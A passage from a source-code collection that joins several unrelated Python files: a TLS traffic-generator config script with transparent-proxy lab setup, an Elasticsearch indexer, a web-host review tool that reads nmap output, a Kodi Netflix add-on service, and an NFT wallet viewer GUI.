"cs_data_len" : {{PARAMS.app_cs_data_len}},
"sc_data_len" : {{PARAMS.app_sc_data_len}},
"cs_start_tls_len" : {{PARAMS.app_cs_starttls_len}},
"sc_start_tls_len" : {{PARAMS.app_sc_starttls_len}}
}
{%- endif %}
{%- endfor %}
]
}
],
"zone_cmds" : [
"ip link set dev {{PARAMS.nb_iface_container}} up",
"ifconfig {{PARAMS.nb_iface_container}} hw ether {{PARAMS.server_mac_seed}}:{{'{:02x}'.format(traffic_id)}}",
"ip route add default dev {{PARAMS.nb_iface_container}} table 200",
"ip -4 route add local 24.2{{traffic_id}}.51.0/24 dev lo",
"ip rule add from 24.2{{traffic_id}}.51.0/24 table 200",
"tcpdump -i {{PARAMS.nb_iface_container}} {{PARAMS.tcpdump}} -w {{PARAMS.pcaps_dir_container.rstrip('/')}}/zone-{{traffic_id}}-server.pcap &"
]
}
{{ "," if not loop.last }}
{%- endfor %}
]
}
''')
if c_args.ecdsa_cert:
c_args.server_cert = '/rundir/certs/server2.cert'
c_args.server_key = '/rundir/certs/server2.key'
else:
c_args.server_cert = '/rundir/certs/server.cert'
c_args.server_key = '/rundir/certs/server.key'
return tlspack_cfg.render(PARAMS = c_args)
def add_tproxy_params (cmd_parser):
pass
def process_tproxy_template (c_args):
tlspack_cfg = jinja2.Template ('''{
"tgen_app" : "tproxy",
"zones" : [
{
"zone_label" : "zone-1-proxy",
"enable" : 1,
"app_list" : [
{
"app_type" : "tcp_proxy",
"app_label" : "tcp_proxy_1",
"enable" : 1,
"proxy_list" : [
{
"proxy_label" : "bae-issue",
"enable" : 1,
"proxy_ip" : "0.0.0.0",
"proxy_port" : 883,
"proxy_type_id" : 1,
"tcp_rcv_buff" : 0,
"tcp_snd_buff" : 0
}
]
}
],
"host_cmds" : [
"sudo ip link set dev {{PARAMS.ta_iface}} up",
"sudo ip link set dev {{PARAMS.tb_iface}} up",
"sudo docker network connect {{PARAMS.ta_macvlan}} {{PARAMS.runtag}}-zone-1-proxy",
"sudo docker network connect {{PARAMS.tb_macvlan}} {{PARAMS.runtag}}-zone-1-proxy"
],
"zone_cmds" : [
"sysctl net.ipv4.conf.all.rp_filter=0",
"sysctl net.ipv4.conf.default.rp_filter=0",
"ip link set dev {{PARAMS.ta_iface_container}} up",
"ifconfig {{PARAMS.ta_iface_container}} hw ether 00:50:56:8c:5a:54",
"sysctl net.ipv4.conf.{{PARAMS.ta_iface_container}}.rp_filter=0",
"ip link add link {{PARAMS.ta_iface_container}} name {{PARAMS.ta_iface_container}}.{{PARAMS.proxy_traffic_vlan}} type vlan id {{PARAMS.proxy_traffic_vlan}}",
"ip link set dev {{PARAMS.ta_iface_container}}.{{PARAMS.proxy_traffic_vlan}} up",
"ip addr add 1.1.1.1/24 dev {{PARAMS.ta_iface_container}}.{{PARAMS.proxy_traffic_vlan}}",
"arp -i {{PARAMS.ta_iface_container}}.{{PARAMS.proxy_traffic_vlan}} -s 1.1.1.254 00:50:56:8c:86:c3",
"ip route add {{PARAMS.ta_subnet}} via 1.1.1.254 dev {{PARAMS.ta_iface_container}}.{{PARAMS.proxy_traffic_vlan}}",
"ip link set dev {{PARAMS.tb_iface_container}} up",
"ifconfig {{PARAMS.tb_iface_container}} hw ether 00:50:56:8c:86:c3",
"sysctl net.ipv4.conf.{{PARAMS.tb_iface_container}}.rp_filter=0",
"ip link add link {{PARAMS.tb_iface_container}} name {{PARAMS.tb_iface_container}}.{{PARAMS.proxy_traffic_vlan}} type vlan id {{PARAMS.proxy_traffic_vlan}}",
"ip link set dev {{PARAMS.tb_iface_container}}.{{PARAMS.proxy_traffic_vlan}} up",
"ip addr add 2.2.2.1/24 dev {{PARAMS.tb_iface_container}}.{{PARAMS.proxy_traffic_vlan}}",
"arp -i {{PARAMS.tb_iface_container}}.{{PARAMS.proxy_traffic_vlan}} -s 2.2.2.254 00:50:56:8c:5a:54",
"ip route add {{PARAMS.tb_subnet}} via 2.2.2.254 dev {{PARAMS.tb_iface_container}}.{{PARAMS.proxy_traffic_vlan}}",
"iptables -t mangle -N DIVERT",
"iptables -t mangle -A PREROUTING -p tcp -m socket -j DIVERT",
"iptables -t mangle -A DIVERT -j MARK --set-mark 1",
"iptables -t mangle -A DIVERT -j ACCEPT",
"ip rule add fwmark 1 lookup 100",
"ip route add local 0.0.0.0/0 dev lo table 100",
"iptables -t mangle -A PREROUTING -i {{PARAMS.ta_iface_container}}.{{PARAMS.proxy_traffic_vlan}} -p tcp --dport 443 -j TPROXY --tproxy-mark 0x1/0x1 --on-port 883",
"iptables -t mangle -A PREROUTING -i {{PARAMS.tb_iface_container}}.{{PARAMS.proxy_traffic_vlan}} -p tcp --dport 443 -j TPROXY --tproxy-mark 0x1/0x1 --on-port 883",
"tcpdump -i {{PARAMS.ta_iface_container}} {{PARAMS.ta_tcpdump}} -w {{PARAMS.pcaps_dir_container.rstrip('/')}}/zone-1-proxy-ta.pcap &",
"tcpdump -i {{PARAMS.tb_iface_container}} {{PARAMS.tb_tcpdump}} -w {{PARAMS.pcaps_dir_container.rstrip('/')}}/zone-1-proxy-tb.pcap &"
]
}
]
}
''')
return tlspack_cfg.render(PARAMS = c_args)
def add_mcert_params (cmd_parser):
pass
def process_mcert_template (c_args):
tlspack_cfg = jinja2.Template('''
{
"tgen_app" : "mcert",
"zones" : [
{% set ns = namespace(cs_grp_count=0, srv_count=0) %}
{%- for traffic_id in range(1, PARAMS.traffic_paths+1) %}
{
"zone_label" : "zone-{{traffic_id}}-client",
"enable" : 1,
"app_list" : [
{
"app_type" : "tls_client",
"app_label" : "tls_client_1",
"enable" : 1,
"conn_per_sec" : {{PARAMS.cps}},
"max_pending_conn_count" : {{PARAMS.max_pipeline}},
"max_active_conn_count" : {{PARAMS.max_active}},
"total_conn_count" : {{PARAMS.total_conn_count}},
"cs_grp_list" : [
{% set ns.cs_grp_count = 0 %}
{%- for tls_ver in ['sslv3', 'tls1', 'tls1_1', 'tls1_2', 'tls1_3'] %}
{%- if (tls_ver == 'sslv3' and PARAMS.sslv3)
or (tls_ver == 'tls1' and PARAMS.tls1)
or (tls_ver == 'tls1_1' and PARAMS.tls1_1)
or (tls_ver == 'tls1_2' and PARAMS.tls1_2)
or (tls_ver == 'tls1_3' and PARAMS.tls1_3) %}
{{ "," if ns.cs_grp_count }}
{% set ns.cs_grp_count = ns.cs_grp_count+1 %}
{
"cs_grp_label" : "cs_grp_{{loop.index}}",
"enable" : 1,
"srv_ip" : "14.2{{traffic_id}}.51.{{loop.index}}",
"srv_port" : 443,
"clnt_ip_begin" : "12.2{{traffic_id}}.51.{{1+loop.index0*10}}",
"clnt_ip_end" : "12.2{{traffic_id}}.51.{{loop.index*10}}",
"clnt_port_begin" : {{PARAMS.port_begin}},
"clnt_port_end" : 65000,
"cipher" : "{{PARAMS.cipher}}",
"tls_version" : "{{tls_ver}}",
"close_type" : "fin",
"close_notify" : "no_send",
"app_rcv_buff" : {{PARAMS.app_rcv_buff}},
"app_snd_buff" : {{PARAMS.app_snd_buff}},
"write_chunk" : {{PARAMS.app_next_write}},
"tcp_rcv_buff" : {{PARAMS.tcp_rcv_buff}},
"tcp_snd_buff" : {{PARAMS.tcp_snd_buff}},
"cs_data_len" : {{PARAMS.app_cs_data_len}},
"sc_data_len" : {{PARAMS.app_sc_data_len}},
"cs_start_tls_len" : 0,
"sc_start_tls_len" : 0
}
{%- endif %}
{%- endfor %}
]
}
],
"zone_cmds" : [
"ip link set dev {{PARAMS.na_iface_container}} up",
"ifconfig {{PARAMS.na_iface_container}} hw ether {{PARAMS.client_mac_seed}}:{{'{:02x}'.format(traffic_id)}}",
"ip route add default dev {{PARAMS.na_iface_container}} table 200",
"ip -4 route add local 12.2{{traffic_id}}.51.0/24 dev lo",
"ip rule add from 12.2{{traffic_id}}.51.0/24 table 200",
"tcpdump -i {{PARAMS.na_iface_container}} {{PARAMS.tcpdump}} -w {{PARAMS.pcaps_dir_container.rstrip('/')}}/zone-{{traffic_id}}-client.pcap &"
]
}
,
{
"zone_label" : "zone-{{traffic_id}}-server",
"enable" : 1,
"iface" : "{{PARAMS.iface_container}}",
"tcpdump" : "{{PARAMS.tcpdump}}",
"app_list" : [
{
"app_type" : "tls_server",
"app_label" : "tls_server_1",
"enable" : 1,
"srv_list" : [
{% set ns.srv_count = 0 %}
{%- for tls_ver in ['sslv3', 'tls1', 'tls1_1', 'tls1_2', 'tls1_3'] %}
{%- if (tls_ver == 'sslv3' and PARAMS.sslv3)
or (tls_ver == 'tls1' and PARAMS.tls1)
or (tls_ver == 'tls1_1' and PARAMS.tls1_1)
or (tls_ver == 'tls1_2' and PARAMS.tls1_2)
or (tls_ver == 'tls1_3' and PARAMS.tls1_3) %}
{{ "," if ns.srv_count }}
{% set ns.srv_count = ns.srv_count+1 %}
{
"srv_label" : "srv_{{loop.index}}",
"enable" : 1,
"emulation_id" : 0,
"srv_ip" : "14.2{{traffic_id}}.51.{{loop.index}}",
"srv_port" : 443,
"srv_cert" : "{{PARAMS.server_cert}}",
"srv_key" : "{{PARAMS.server_key}}",
"cipher" : "{{PARAMS.cipher}}",
"tls_version" : "{{tls_ver}}",
"close_type" : "fin",
"close_notify" : "no_send",
"app_rcv_buff" : {{PARAMS.app_rcv_buff}},
"app_snd_buff" : {{PARAMS.app_snd_buff}},
"write_chunk" : {{PARAMS.app_next_write}},
"tcp_rcv_buff" : {{PARAMS.tcp_rcv_buff}},
"tcp_snd_buff" : {{PARAMS.tcp_snd_buff}},
"cs_data_len" : {{PARAMS.app_cs_data_len}},
"sc_data_len" : {{PARAMS.app_sc_data_len}},
"cs_start_tls_len" : 0,
"sc_start_tls_len" : 0
}
{%- endif %}
{%- endfor %}
]
}
],
"zone_cmds" : [
"ip link set dev {{PARAMS.nb_iface_container}} up",
"ifconfig {{PARAMS.nb_iface_container}} hw ether {{PARAMS.server_mac_seed}}:{{'{:02x}'.format(traffic_id)}}",
"ip route add default dev {{PARAMS.nb_iface_container}} table 200",
"ip -4 route add local 14.2{{traffic_id}}.51.0/24 dev lo",
"ip rule add from 14.2{{traffic_id}}.51.0/24 table 200",
"tcpdump -i {{PARAMS.nb_iface_container}} {{PARAMS.tcpdump}} -w {{PARAMS.pcaps_dir_container.rstrip('/')}}/zone-{{traffic_id}}-server.pcap &"
]
}
{{ "," if not loop.last }}
{%- endfor %}
]
}
''')
return tlspack_cfg.render(PARAMS = c_args)
def get_arguments ():
arg_parser = argparse.ArgumentParser(description = 'test commands')
subparsers = arg_parser.add_subparsers(dest='cmd_name'
,help='sub-command help')
cps_parser = subparsers.add_parser('cps', help='cps help')
add_traffic_params(cps_parser)
add_cps_params (cps_parser)
bw_parser = subparsers.add_parser('bw', help='bw help')
add_traffic_params(bw_parser)
add_bw_params (bw_parser)
mcert_parser = subparsers.add_parser('mcert', help='mcert help')
add_traffic_params(mcert_parser)
add_mcert_params (mcert_parser)
tproxy_parser = subparsers.add_parser('tproxy', help='tproxy help')
add_proxy_params (tproxy_parser)
add_tproxy_params (tproxy_parser)
stop_parser = subparsers.add_parser('stop', help='stop help')
add_stop_params (stop_parser)
c_args = arg_parser.parse_args()
return c_args
if __name__ == '__main__':
try:
c_args = get_arguments ()
except Exception as er:
print er
sys.exit(1)
if c_args.cmd_name in ['cps', 'bw', 'tproxy', 'mcert']:
try:
with open(os.path.join (c_args.host_rundir
, 'registry'
, 'pods'
, c_args.pod
, 'config.json') ) as f:
pod_info = json.load(f)
except Exception as er:
print 'invalid pod {}'.format (c_args.pod)
sys.exit(1)
c_args.pcaps_dir_container = os.path.join(c_args.target_rundir, 'traffic', c_args.runtag, 'pcaps')
if c_args.cmd_name in ['cps', 'bw', 'mcert']:
c_args.na_iface_container = filter (lambda n : n['host_iface'] == c_args.na_iface, pod_info['networks'])[0]['container_iface']
c_args.nb_iface_container = filter (lambda n : n['host_iface'] == c_args.nb_iface, pod_info['networks'])[0]['container_iface']
c_args.traffic_paths = pod_info['containers']['count'] / 2
c_args.cps = c_args.cps / c_args.traffic_paths
c_args.max_active = c_args.max_active / c_args.traffic_paths
c_args.max_pipeline = c_args.max_pipeline / c_args.traffic_paths
supported_cipher_names = map(lambda x : x['cipher_name']
, supported_ciphers)
if c_args.cmd_name == 'cipher':
selected_ciphers = map(lambda x : x.strip(), c_args.cipher.split(':'))
for ciph in selected_ciphers:
if ciph not in supported_cipher_names:
raise Exception ('unsupported cipher - ' + ciph)
elif c_args.cmd_name == 'cps':
if c_args.cipher not in supported_cipher_names:
raise Exception ('unsupported cipher - ' + c_args.cipher)
elif c_args.cmd_name in ['tproxy']:
c_args.ta_iface_container = filter (lambda n : n['host_iface'] == c_args.ta_iface, pod_info['networks'])[0]['container_iface']
c_args.tb_iface_container = filter (lambda n : n['host_iface'] == c_args.tb_iface, pod_info['networks'])[0]['container_iface']
if c_args.cmd_name == 'cps':
traffic_s = process_cps_template(c_args)
elif c_args.cmd_name == 'bw':
traffic_s = process_bw_template(c_args)
elif c_args.cmd_name == 'tproxy':
traffic_s = process_tproxy_template(c_args)
elif c_args.cmd_name == 'mcert':
traffic_s = process_mcert_template(c_args)
start_run(c_args, traffic_s)
elif c_args.cmd_name == 'stop':
try:
with open(os.path.join (c_args.host_rundir
, 'registry'
, 'runs'
, c_args.runtag
, 'config.json') ) as f:
runs_info = json.load(f)
except Exception as er:
print 'invalid runtag {}'.format(c_args.runtag)
sys.exit(1)
c_args.pod = runs_info['pod']
try:
with open(os.path.join (c_args.host_rundir
, 'registry'
, 'pods'
, c_args.pod
, 'config.json') ) as f:
pod_info = json.load(f)
except Exception as er:
print 'invalid pod {}'.format (c_args.pod)
sys.exit(1)
stop_run (pod_info, c_args)
|
crawler_document_indexer.py
|
from models import CrawlerDocument
from mongoengine import connect
from threading import Thread, Lock
from elasticsearchcli import ElasticSearchCli
import logging
from mongoengine import register_connection
logging.basicConfig(level = logging.DEBUG)
'''
Class is responsible for managing the index
'''
class IndexController(object):
def __init__(self):
# register connection to the databases when the server starts
register_connection('fillmyfridge', 'fillmyfridge')
self.index_name = 'tinmart'
self.elasticsearchcli = ElasticSearchCli(self.index_name)
def __create_lucene_dict(self, crawler_document):
return {
'docId': crawler_document.docId,
'title': crawler_document.title,
'category': crawler_document.category,
'price': crawler_document.price,
}
def __add_document(self, crawler_document):
lucene_document = self.__create_lucene_dict(crawler_document)
docId = str(lucene_document['docId'])
status = self.elasticsearchcli.index_document('products', docId, lucene_document)
if status:
logging.debug('Document: {} indexed...'.format(docId))
'''
Indexes all the documents in mongodb in a multithreaded fashion
'''
def index_crawled_documents(self):
crawler_documents = CrawlerDocument.objects
for crawler_document in crawler_documents:
# create the thread passing in the method which indexes lucene
thread = Thread(target = self.__add_document, args = (crawler_document, ))
thread.start()
'''
Deletes an index from the database
'''
def delete_index(self):
logging.debug('Index {} removed...'.format(self.index_name))
status = self.elasticsearchcli.delete_index()
|
http_Review.py
|
#!/usr/bin/python3
from modules import *
import argparse
import sys
import threading
def reportrun(web_hosts):
reportFolder = reportOUTPUT.makereportFolder()
makereportSTART.makereportstart(reportFolder)
threads = []
for host in web_hosts:
t = threading.Thread(target=webRequest.webcheck, args=(host, reportFolder), daemon=True)
threads.append(t)
t.start()
for thread in threading.enumerate():
if thread is not threading.currentThread():
thread.join()
makereportEND.makereportend(reportFolder)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument("-f", "--file", help="Provide a text file or files with a list of IPs", nargs="+")
parser.add_argument("-g", "--gnmap", help="Provide a Nmap gnmap file or files to parse", nargs="+")
parser.add_argument("-x", "--xml", help="Provide a Nmap XML file or files to parse", nargs="+")
args = parser.parse_args()
if len(sys.argv) == 1:
parser.print_help()
sys.exit()
if args.xml:
web_hosts = parseXML.parsexml(args.xml)
elif args.gnmap:
web_hosts = parseGNMAP.parsegnmap(args.gnmap)
elif args.file:
web_hosts = parseFILE.parsefile(args.file)
reportrun(web_hosts)
|
service.py
|
# -*- coding: utf-8 -*-
# Author: asciidisco
# Module: service
# Created on: 13.01.2017
# License: MIT https://goo.gl/5bMj3H
"""Kodi plugin for Netflix (https://netflix.com)"""
# pylint: disable=import-error
import threading
import socket
import sys
from datetime import datetime, timedelta
import xbmc
from resources.lib.NetflixCommon import NetflixCommon
from resources.lib.MSLHttpRequestHandler import MSLTCPServer
from resources.lib.NetflixHttpRequestHandler import NetflixTCPServer
from resources.lib.playback import PlaybackController
from resources.lib.playback.bookmarks import BookmarkManager
from resources.lib.playback.stream_continuity import StreamContinuityManager
from resources.lib.playback.section_skipping import SectionSkipper
def select_unused_port():
"""
Helper function to select an unused port on the host machine
:return: int - Free port
"""
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind(('127.0.0.1', 0))
_, port = sock.getsockname()
sock.close()
return port
# Setup plugin
BASE_URL = sys.argv[0]
PLUGIN_HANDLE = None
def strp(value, form):
"""
Helper function to safely create datetime objects from strings
:return: datetime - parsed datetime object
"""
# pylint: disable=broad-except
from time import strptime
def_value = datetime.utcfromtimestamp(0)
try:
return datetime.strptime(value, form)
except TypeError:
try:
return datetime(*(strptime(value, form)[0:6]))
except ValueError:
return def_value
except Exception:
return def_value
class NetflixService(object):
"""
Netflix addon service
"""
def __init__(self):
# init kodi helper (for logging)
self.nx_common = NetflixCommon(plugin_handle=PLUGIN_HANDLE,
base_url=BASE_URL)
self.last_schedule_check = datetime.now()
self.schedule_check_interval = int(self.nx_common.get_setting(
'schedule_check_interval'))
self.startidle = 0
self.freq = int('0' + self.nx_common.get_setting('auto_update'))
# pick & store a port for the MSL service
msl_port = select_unused_port()
self.nx_common.set_setting('msl_service_port', str(msl_port))
self.nx_common.log(msg='[MSL] Picked Port: ' + str(msl_port))
# pick & store a port for the internal Netflix HTTP proxy service
ns_port = select_unused_port()
self.nx_common.set_setting('netflix_service_port', str(ns_port))
self.nx_common.log(msg='[NS] Picked Port: ' + str(ns_port))
self.nx_common.flush_settings()
# server defaults
MSLTCPServer.allow_reuse_address = True
NetflixTCPServer.allow_reuse_address = True
# configure the MSL Server
self.msl_server = MSLTCPServer(('127.0.0.1', msl_port),
self.nx_common)
# configure the Netflix Data Server
self.ns_server = NetflixTCPServer(('127.0.0.1', ns_port),
self.nx_common)
self.msl_thread = threading.Thread(
target=self.msl_server.serve_forever)
self.ns_thread = threading.Thread(
target=self.ns_server.serve_forever)
def _start_servers(self):
self.msl_server.server_activate()
self.msl_server.timeout = 1
# start thread for MLS servie
self.msl_thread.start()
self.nx_common.log(msg='[MSL] Thread started')
self.ns_server.server_activate()
self.ns_server.timeout = 1
# start thread for Netflix HTTP service
self.ns_thread.start()
self.nx_common.log(msg='[NS] Thread started')
def _shutdown(self):
# MSL service shutdown sequence
self.msl_server.server_close()
self.msl_server.shutdown()
self.msl_thread.join()
self.msl_server = None
self.msl_thread = None
self.nx_common.log(msg='Stopped MSL Service')
# Netflix service shutdown sequence
self.ns_server.server_close()
self.ns_server.shutdown()
self.ns_thread.join()
self.ns_server = None
self.ns_thread = None
self.nx_common.log(msg='Stopped HTTP Service')
def _is_idle(self):
if self.nx_common.get_setting('wait_idle') != 'true':
return True
lastidle = xbmc.getGlobalIdleTime()
if xbmc.Player().isPlaying():
self.startidle = lastidle
if lastidle < self.startidle:
self.startidle = 0
idletime = lastidle - self.startidle
return idletime >= 300
def _update_running(self):
update = self.nx_common.get_setting('update_running') or 'false'
if update != 'false':
starttime = strp(update, '%Y-%m-%d %H:%M')
if (starttime + timedelta(hours=6)) <= datetime.now():
self.nx_common.set_setting('update_running', 'false')
self.nx_common.log(
'Canceling previous library update - duration > 6 hours',
xbmc.LOGWARNING)
else:
self.nx_common.log('DB Update already running')
return True
return False
def run(self):
"""
Main loop. Runs until xbmc.Monitor requests abort
"""
self._start_servers()
controller = PlaybackController(self.nx_common)
controller.action_managers = [
BookmarkManager(self.nx_common),
SectionSkipper(self.nx_common),
StreamContinuityManager(self.nx_common)
]
player = xbmc.Player()
while not controller.abortRequested():
if self.ns_server.esn_changed():
self.msl_server.reset_msl_data()
try:
if player.isPlayingVideo():
controller.on_playback_tick()
if self.library_update_scheduled() and self._is_idle():
self.update_library()
except RuntimeError as exc:
self.nx_common.log(
'RuntimeError in main loop: {}'.format(exc), xbmc.LOGERROR)
if controller.waitForAbort(1):
break
self._shutdown()
def library_update_scheduled(self):
"""
Checks if the scheduled time for a library update has been reached
"""
now = datetime.now()
next_schedule_check = (
self.last_schedule_check +
timedelta(minutes=self.schedule_check_interval))
if not self.freq or now <= next_schedule_check:
'''
self.nx_common.log('Auto-update disabled or schedule check '
'interval not complete yet ({} / {}).'
.format(now, next_schedule_check))
'''
return False
self.last_schedule_check = now
time = self.nx_common.get_setting('update_time') or '00:00'
lastrun_date = (self.nx_common.get_setting('last_update') or
'1970-01-01')
lastrun_full = lastrun_date + ' ' + time[0:5]
lastrun = strp(lastrun_full, '%Y-%m-%d %H:%M')
freqdays = [0, 1, 2, 5, 7][self.freq]
nextrun = lastrun + timedelta(days=freqdays)
self.nx_common.log(
'It\'s currently {}, next run is scheduled for {}'
.format(now, nextrun))
return now >= nextrun
def update_library(self):
"""
Triggers an update of the local Kodi library
"""
if not self._update_running():
self.nx_common.log('Triggering library update', xbmc.LOGNOTICE)
xbmc.executebuiltin(
('XBMC.RunPlugin(plugin://{}/?action=export-new-episodes'
'&inbackground=True)')
.format(self.nx_common.get_addon().getAddonInfo('id')))
if __name__ == '__main__':
NetflixService().run()
|
wallet.py
|
from alert import alert
from appwindow import AppWindow
from cache import Cache
from cachemanager import CacheManager
from cards import Cards
from config import BaseConfig, LocalConfig
from datetime import datetime
from downloader import Downloader
from enum import Enum
from ethereum import Ethereum
from opensea import OpenSea
from os import stat
from pushcontainer import push_container
from singleton import Singleton
from singleton import Singleton
from sortdirection import SortDirection
from threading import Lock, Thread, Event
from time import sleep
import dearpygui.dearpygui as dpg
import webbrowser
class DataColumns(Enum):
TokenId = 1
Quantity = 2
ETH = 3
USD = 4
Name = 5
Link = 6
ImageUrl = 7
ThumbnailUrl = 8
Properties = 9
TotalSupply = 10
WithheldSupply = 11
UnreleasedPercentage = 12
class Wallet(metaclass=Singleton):
MenuBar = dpg.generate_uuid()
ProgressBar = dpg.generate_uuid()
TableData = []
TableDataLock = Lock()
AssetsTableLock = Lock()
TableSortPreference = (DataColumns.ETH.name, SortDirection.Descending())
def __init__(self, width, height, mainWindow:AppWindow, baseConfig:BaseConfig, localConfig:LocalConfig, logInfoCallback, logErrorCallback):
# options
self.mainWindow = mainWindow
self.baseConfig = baseConfig
self.localConfig = localConfig
self.logInfoCallback = logInfoCallback
self.logErrorCallback = logErrorCallback
# data
self.lastUpdateTime = 0
self.dataUpdated = Event()
# UI elements
self.addressText = dpg.generate_uuid()
self.ethPriceText = dpg.generate_uuid()
self.lastUpdateText = dpg.generate_uuid()
self.table = dpg.generate_uuid()
self.totalETHText = dpg.generate_uuid()
self.totalUSDText = dpg.generate_uuid()
self.window = dpg.generate_uuid()
# dependencies
self.cache = CacheManager(baseConfig, localConfig)
self.cards = Cards(
logInfoCallback=logInfoCallback,
logErrorCallback=logErrorCallback)
self.downloader = Downloader(
baseConfig=baseConfig,
localConfig=localConfig,
logInfoCallback=logInfoCallback,
logErrorCallback=logErrorCallback)
with dpg.window(
id=self.window,
label="Wallet",
width=width,
height=height,
show=True):
dpg.add_menu_bar(id=Wallet.MenuBar, parent=self.window)
dpg.add_progress_bar(parent=Wallet.MenuBar, id=Wallet.ProgressBar, label="ProgressBar", overlay="status", default_value = 0.0)
dpg.add_input_text(
id=self.addressText,
label="Wallet Address",
default_value=localConfig.Get('WalletAddress'),
width=400)
watt = dpg.add_tooltip(parent=self.addressText)
dpg.add_text(default_value="Put the address of a wallet you want to view here and click 'Refresh'", parent=watt)
dpg.add_same_line(spacing=2)
dpg.add_button(label="Refresh", callback=self.Update)
dpg.add_text("Asset Value (ETH):")
dpg.add_same_line(spacing=4)
dpg.add_text(id=self.totalETHText)
dpg.add_same_line(spacing=10)
dpg.add_text("Ethereum Value (USD/ETH):")
dpg.add_same_line(spacing=4)
dpg.add_text(id=self.ethPriceText)
dpg.add_same_line(spacing=10)
dpg.add_text("Asset Value (USD):")
dpg.add_same_line(spacing=4)
dpg.add_text(id=self.totalUSDText)
dpg.add_same_line(spacing=10)
dpg.add_text("Last Refresh:")
dpg.add_same_line(spacing=4)
dpg.add_text(id=self.lastUpdateText)
self.InitTable()
# kick things off with a refresh
#self.cancelUpdate = SetInterval(60*10, self.Update)
def InitTable(self):
t = dpg.add_table(
id=self.table,
parent=self.window,
header_row=True,
sortable=True,
reorderable=True,
resizable=True,
no_host_extendX=True,
policy=dpg.mvTable_SizingStretchProp,
callback=self.SortHandler
)
with push_container(t) as table:
dpg.add_table_column(label=DataColumns.Quantity.name, default_sort=True, prefer_sort_descending=True)
dpg.add_table_column(label=DataColumns.TotalSupply.name, default_sort=True, prefer_sort_descending=True)
dpg.add_table_column(label=DataColumns.WithheldSupply.name, default_sort=True, prefer_sort_descending=True)
dpg.add_table_column(label=DataColumns.UnreleasedPercentage.name, default_sort=True, prefer_sort_descending=True)
dpg.add_table_column(label=DataColumns.ETH.name, default_sort=True, prefer_sort_descending=True)
dpg.add_table_column(label=DataColumns.USD.name, default_sort=True, prefer_sort_descending=True)
dpg.add_table_column(label=DataColumns.Name.name, default_sort=True, prefer_sort_ascending=True)
dpg.add_table_column(label=DataColumns.Properties.name, no_sort=True)
return table
def Update(self):
try:
# read the wallet address provided by the user
walletAddress = Ethereum.w3.toChecksumAddress(dpg.get_value(self.addressText))
self.localConfig.Set('WalletAddress', walletAddress)
self.localConfig.Save()
contractAddress = Ethereum.w3.toChecksumAddress(self.baseConfig.Get('ContractAddress'))
except ValueError:
alert("Wallet Address Error", f"The address you provided wasn't in the right format.\n\nIt should look like:\n\n{self.baseConfig.Get('DonationAddress')}")
return
except Exception as e:
alert("Wallet Address Error", f"Something went wrong: {str(e)}")
return
self.dataUpdated.clear()
Thread(target=self.UpdateTableData, args=(walletAddress, contractAddress), daemon=True).start()
Thread(target=self.UpdateAssetsTable, daemon=True).start()
def Show(self):
dpg.configure_item(self.window, show=True)
def HoverHandler(self, sender, app_data, user_data):
fileName = user_data['FileName']
# the current image displayed is the same as the image we're trying to display
if dpg.does_item_exist(self.mainWindow.CardWindowImage):
if dpg.get_item_user_data(self.mainWindow.CardWindowImage) == fileName:
return
# the texture is already loaded, so just switch to it
if self.cache.IsCached(Cache.Textures, fileName):
dpg.set_item_user_data(self.mainWindow.CardWindowImage, fileName)
w, h, data = self.cache.textures[fileName]
dpg.set_value(self.mainWindow.CardWindowImageTexture, data)
return
# the texture isn't in the file cache
if not self.cache.IsCached(Cache.Images, fileName):
self.downloader.Enqueue(url=user_data['URL'], fileName=fileName)
# the texture is in the file cache, so load it
if self.cache.IsCached(Cache.Images, fileName):
# load the texture
fullName = self.cache.GetCachePath(Cache.Images, fileName)
self.logInfoCallback(f"Loading {fileName}")
loadedImage = dpg.load_image(fullName)
if loadedImage:
self.logInfoCallback(f"Loaded {fileName}. Installing texture...")
w, h, _, data = loadedImage
# cache it
self.cache.textures[fileName] = (w, h, data)
# set it
with dpg.texture_registry():
if dpg.does_item_exist(self.mainWindow.CardWindowImageTexture):
dpg.set_value(self.mainWindow.CardWindowImageTexture, data)
dpg.set_value(self.mainWindow.CardWindowImage, fileName)
else:
dpg.add_dynamic_texture(id=self.mainWindow.CardWindowImageTexture, width=w, height=h, default_value=data)
dpg.add_image(texture_id=self.mainWindow.CardWindowImageTexture, id=self.mainWindow.CardWindowImage, parent=self.mainWindow.CardWindow, user_data=fileName, width=w / 2 + 20, height=h / 2 + 50)
else:
self.logErrorCallback(f"Couldn't load {fileName}.")
if stat(fileName).st_size == 0:
self.logErrorCallback(f"{fileName} is 0 bytes long. Consider deleting it.")
def Show(self):
dpg.configure_item(self.window, show=True)
def SortHandler(self, sender, app_data, user_data):
column, direction = app_data[0]
columnName = dpg.get_item_configuration(column)['label']
self.dataUpdated.clear()
self.SortTableData(columnName, direction != 1)
self.UpdateAssetsTable()
def UpdateAssetsTable(self):
# wait for the update signal
self.dataUpdated.wait()
with Wallet.AssetsTableLock:
walletAddress = self.localConfig.Get('WalletAddress')
contractAddress = self.baseConfig.Get('ContractAddress')
if not Wallet.TableData:
self.UpdateTableData(walletAddress, contractAddress)
with Wallet.TableDataLock:
if dpg.does_item_exist(self.table):
dpg.delete_item(self.table)
self.InitTable()
for row in Wallet.TableData:
tokenId = row[DataColumns.TokenId.name]
imageFileName = f"{contractAddress}.{tokenId}.f.png"
thumbFileName = f"{contractAddress}.{tokenId}.t.png"
record = [
row[DataColumns.Quantity.name],
row[DataColumns.TotalSupply.name],
row[DataColumns.WithheldSupply.name],
"{0:.2f}%".format(row[DataColumns.UnreleasedPercentage.name]),
"ETH {0:,.4f}".format(row[DataColumns.ETH.name]),
"${0:,.2f}".format(row[DataColumns.USD.name]),
]
hoverData = {
"URL": row[DataColumns.ImageUrl.name],
"FileName": imageFileName,
"ThumbName": thumbFileName,
"Name": row[DataColumns.Name.name],
"TokenId": row[DataColumns.TokenId.name]
}
for t in record:
txt = dpg.add_text(default_value=t, parent=self.table)
hoverData['EventSource'] = txt
dpg.add_hover_handler(parent=txt, callback=self.HoverHandler, user_data=hoverData)
dpg.add_table_next_column(parent=self.table)
btn = dpg.add_button(
label=row[DataColumns.Name.name],
parent=self.table,
user_data=row[DataColumns.Link.name],
callback=lambda _,__,url=row[DataColumns.Link.name]: webbrowser.open(url)
)
tt = dpg.add_tooltip(parent=btn)
dpg.add_text(f"TokenID: {tokenId}", parent=tt)
dpg.add_text("\n".join(row[DataColumns.Properties.name].values()), parent=tt)
hoverData['EventSource'] = btn
